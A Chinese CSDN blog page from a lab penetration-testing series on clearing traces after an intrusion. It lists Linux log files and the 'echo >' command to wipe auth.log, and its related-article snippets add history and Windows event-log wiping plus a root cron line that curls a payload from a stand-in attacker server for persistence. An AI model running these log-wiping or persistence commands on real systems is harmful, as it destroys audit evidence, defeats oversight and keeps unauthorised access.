靶机渗透(零)清除痕迹

最新推荐文章于 2024-07-15 23:58:15 发布
最新推荐文章于 2024-07-15 23:58:15 发布
阅读量1.1k 收藏 6
点赞数 1
分类专栏: 靶机渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42180996/article/details/89874004
版权

清除痕迹

 

1.查看日志文件(/var/log)

2./var/log/auth.log(身份认证日志)

3./var/log/btmp(错误登录日志)

4./var/log/utmp(当前登录的用户信息)

5./var/log/wtmp(永久记录用户登录、注销及系统的启动、停机的事件)

6./var/log/faillog(登录失败日志)

7./var/log/lastlog(最后一次登录时间日志)

8./root/.bash_history(历史操作文件)

1.查看日志文件(/var/log)

2./var/log/auth.log(身份认证日志)

cat /var/log/auth.log
echo > /var/log/auth.log

  • auth.log包含系统授权信息(用户登录和使用的权限机制)等

  • 可以使用“echo > 日志路径”,来清空日志文件内容

3./var/log/btmp(错误登录日志)

sudo last -f /var/log/btmp

  • 该日志是一个二进制文件,不能直接通过文本编辑器打开

4./var/log/utmp

最低0.47元/天 解锁文章
靶机Lazysysadmin练习:samba服务连接发现共享文件用户信息、sudo命令提权、清除日志痕迹
7Riven's blog
12-16 569
攻击机IP地址 1.目标主机发现 netdiscover -i eth0 -r 192.168.109.0/24 扫描开放端口:masscan --rate=10000 -p 0-65535 192.168.109.162 确认端口开的服务:nmap -sV -T4 -O -p 445,22,3306,139,6667,80 192.168.109.162 2.端口利用 ...
MoneyBox 靶机笔记
MZa1213123的博客
03-05 4762
一、搜集信息 1、搭建好 MoneyBox 的靶机后,由于是桥接网络,用 nmap 扫描网段 nmap 10.77.192.0/24 发现目标为 10.77.192.219 继续搜集信息 nmap -sV -A 10.77.192.219 发现可以匿名 ftp 登录和开放了 80 端口还有 ssh 进网站看看有什么线索 记得看看源码(ctrl + u) 没发现什么有用的 gobuster 扫描一下网站的目录 发现 blogs 路径 继续查看该路径以及其源码
渗透后消除痕迹的方法及实例讲解
白帽子佳奇的博客
12-07 2973
在网络安全领域,渗透后消除痕迹是一个关键的环节。作为一名专业的网络安全从业者,我认识到在成功完成渗透测试后,有效地清除所有痕迹的重要性。很多新手,渗透了忘记擦屁股,最后暴露,如果你刚接触网安,欢迎探讨。
浅谈在渗透测试中如何清理痕迹-网络安全(黑客)自学
MachineGunJoe666
04-29 385
渗透测试中,清除痕迹可以很好的保护自己。在Linux系统中,如何有效的清除使用痕迹呢?不妨看看这篇文章吧!
shell 脚本之清除日志记录
weixin_33675507的博客
07-23 232
一个简单的清除系统日志和登录日志的shell 脚本#!/bin/sh#clean up system logsLOG_DIR=/var/logROOT_UID=0 # When $UID=0, session have a root permissionLINES=50 # default save linesE_XCD=66E_NOTROOT=67if [ "$U...
靶机渗透测试实战(一)——熟悉渗透测试流程的简单测试
热门推荐
橘子女侠
05-09 1万+
本篇文章不注重于渗透测试,而在于将之前学习过的方法加以熟悉; 1. 实验环境 靶机:CentOS 6.7,IP地址为:192.168.37.137 攻击机:Kali,IP地址为:192.168.37.131 运行环境:VMware 2. 实验步骤 信息收集 (1)查询攻击机Kali的IP地址; (2)识别存活的主机,发现攻击的目标 (注:二、三、四层发现的目的都是识别...
靶机渗透测试实战(二)——Lazysysadmin渗透实战
橘子女侠
05-09 4781
目录 一. 实验环境 二. 实验步骤 (1)信息收集——主机发现 (2)信息收集——端口扫描 (3)渗透测试 139,445端口(共享服务) 80端口(Apache服务——http) 22端口(SSH服务) 三. 实验总结 一. 实验环境 靶机:Lazsysadmin,IP地址:暂时未知; 测试机:Kali,IP地址:192.168.37.131; 测试机:物理机w...
DC-4-Web渗透测试靶机
01-19
7. **数据泄露与清理**:攻击者可能试图获取敏感信息,如用户数据、服务器配置等,并在完成测试后清除所有痕迹,确保系统恢复到正常状态。 在使用DC-4.ova这个靶机时,你需要虚拟化软件(如VirtualBox或VMware)来...
靶机渗透测试实战(五)——Node渗透实战
橘子女侠
05-11 3950
目录 一. 实验环境 二. 实验流程 三. 实验步骤 (1)信息收集——主机发现 1. 查看Kali的IP信息;(IP:192.168.37.131) 2. 扫描主机(netdiscover) (2)信息收集——端口扫描 1. 扫描端口(masscan) 2. 详细扫描端口信息(nmap) (3)渗透测试 3000端口(http服务) 1. 访问目标靶...
渗透测试入门10之痕迹清理
鹿鸣天涯
04-03 2180
渗透测试入门10之痕迹清理 Windows日志清除 获取日志分类列表: wevtutil el >1.txt 获取单个日志类别的统计信息: eg. wevtutil gli "windows powershell" 回显: creationTime: 2016-11-28T06:01:37.986Z lastAccessTime: 2016-11-28T06:01:37.98...
Linux下/ar/log目錄下日誌文件功能
weixin_34241036的博客
03-06 515
如果愿意在Linux环境方面花费些时间,首先就应该知道日志文件的所在位置以及它们包含的内容。在系统运行正常的情况下学习了解这些不同的日志文件有助于你在遇到紧急情况时从容找出问题并加以解决。 以下介绍的是20个位于/var/log/ 目录之下的日志文件。其中一些只有特定版本采用,如dpkg.log只能在基于Debian的系统中看到。 /var/log/messages —...
linux如何删除最近操作的日志
githubcurry
10-08 2106
如果希望管理日志文件的空间,可以考虑使用日志轮替工具(如logrotate)来管理日志文件的大小,并确保及时备份重要日志。Linux系统下,不同的应用程序可能会生成不同的日志文件。如果你想要删除最近一段时间内的操作日志,可以使用一些命令来完成。history:该命令用于显示用户在终端中执行的命令历史记录。注意,这将仅删除.bash_history文件中的命令历史记录,而不是其他日志文件。该命令将清空/var/log/auth.log文件中的内容。该命令将清空/var/log/syslog文件中的内容。
Kali Linux渗透测试 049 清除痕迹
kevinhanser
03-04 5187
本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程 1. 清除渗透攻击痕迹
linux后渗透痕迹清除
The current road is different, love needs to distinguish between right and wrong
11-20 4174
历史记录清除 Bash、shell、终端将当前会话中使用的命令列表保存在内存中,因此必须对其进行清理。 history用于命令查看当前历史记录。 环境变量:HISTFILE 查找history命令文件存储路径: echo $HISTFILE #返回当前用户history命令存储文件路径 删除变量: unset HISTFILE 这时候在使用一次"echo HISTFILE"将返回为空。 为了防止历史命令被保存,也可以将其发送到/dev/null HISTFILE=...
linux删除历史操作命令
wd520521的博客
07-21 3127
有时候在系统中做了任何操作,但不想被别人知道,毕竟系统别人都可以登入查看,那怎么把自己操作系统的历史命令删除而不让别人知晓呢? 在linux系统里一旦操作了任何命令,都会被记录下来,可以通过history命令来查看历史命令,查看手册可知history -c 便是清除历史命令。 history -c 但是重新进入系统查看历史命令时,历史信息依然会存在,那么history -c 只是清除当前shell的历史纪录,因为系统一般会把信息保存在一个文件中,只要文件中内...
如何在Linux服务器上检查 sshd 日志?
A5互联
10-24 1万+
sshd是Secure SHell Daemon的缩写。它是一个隐藏的进程,默默地监听Linux操作系统的所有认证和登录尝试。这个进程在你启动Linux操作系统时就会启动,它负责通过建立两个实体之间的连接,使它们之间通过不安全的通信渠道进行安全通信。 如果你试图找出任何未经授权的登录系统的尝试,这个守护进程的日志文件特别有用。为了做到这一点,你将不得不检查Linux上的sshd日志。因此,在这篇文章中,我们将探讨两种不同的方法来检查Linux操作系统上的sshd日志。 注:以下两种方法已经在Ubuntu 2
玄机-第一章 应急响应-Linux日志分析
本散修的一些学习心得与笔记,道友请自便。
07-15 1089
玄机-第一章 应急响应-Linux日志分析 简介 账号root密码linuxrz ssh root@IP 1.有多少IP在爆破主机ssh的root帐号,如果有多个使用","分割 2.ssh爆破成功登陆的IP是多少,如果有多个使用","分割 3.爆破用户名字典是什么?如果有多个使用","分割 4.登陆成功的IP共爆破了多少次 5.黑客登陆主机后新建了一个后门用户,用户名是多少
渗透阶段清理痕迹方式总结
明哥哥知识分享
03-17 898
一、前言 在渗透完成之后,为了减少被发现和追溯的概率,攻击者有必要清除自己的攻击痕迹,本文分别对windows和linux上清理痕迹的方式做一个总结。 二、windows 有远程桌面权限时手动删除日志: 开始-程序-管理工具-计算机管理-系统工具-事件查看器-清除日志 wevtutil: wevtutil el 列出系统中所有日志名称 wevtutil cl system 清理系统日志 wevtutil cl application 清理应用程序日志 wevtutil cl
渗透测试——痕迹清除
zjdda的博客
07-11 1993
当我们达到了目的之后,有时候只是为了黑入网站挂黑页,炫耀一下;或者在网站留下一个后门,作为肉鸡,没事的时候上去溜达溜达;亦或者挂入挖矿木马;但是大家千万不要干这些事,这些都是违法的!
vulnhub靶机渗透测试教学连接蚁剑
最新发布
01-11
### 关于 Vulnhub 靶机渗透测试教学资源 对于希望深入学习并实践渗透测试技能的人来说,Vulnhub 提供了一个理想的平台。JIS-CTF入门靶场非常适合刚开始接触渗透测试的新手[^4]。 #### 蚁剑 (AntSword) 的使用教程 蚁剑是一款功能强大的 WebShell 管理工具,支持多种编程语言编写的WebShell管理,并且具有良好的界面设计和丰富的特性。以下是基于蚁剑进行渗透测试的一个简单流程: 1. **获取 WebShell** 在许多情况下,通过漏洞利用可以获得目标服务器上的一个简易webshell访问权限。例如,在某些特定条件下可以上传php文件或执行远程代码注入攻击获得初步控制权。 2. **连接至蚁剑客户端** 下载并安装蚁剑后打开程序,点击`新建站点`,输入相应的URL路径,用户名密码等信息完成配置。 3. **探索与提权** 利用蚁剑内置的功能模块进一步探测系统内部结构,尝试发现潜在的安全弱点以便实施本地提权或其他高级操作。比如读取敏感文件、枚举网络接口等等。 4. **保持持久化** 成功取得较高权限之后,考虑如何建立稳定可靠的反向连接通道以维持长期控制。这可能涉及到设置计划任务、修改启动项等多种手段确保即使重启也能自动恢复会话。 ```bash # 设置Linux定时任务实现开机自启脚本 echo "* * * * * curl http://yourserver/payload.php" >> /var/spool/cron/root ``` 5. **清理痕迹** 完成所有预定动作前务必清除日志记录和其他可能会暴露身份的信息以防被管理员察觉异常活动的存在。 需要注意的是上述内容仅用于合法授权范围内的安全评估工作,请勿非法入侵他人计算机信息系统!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值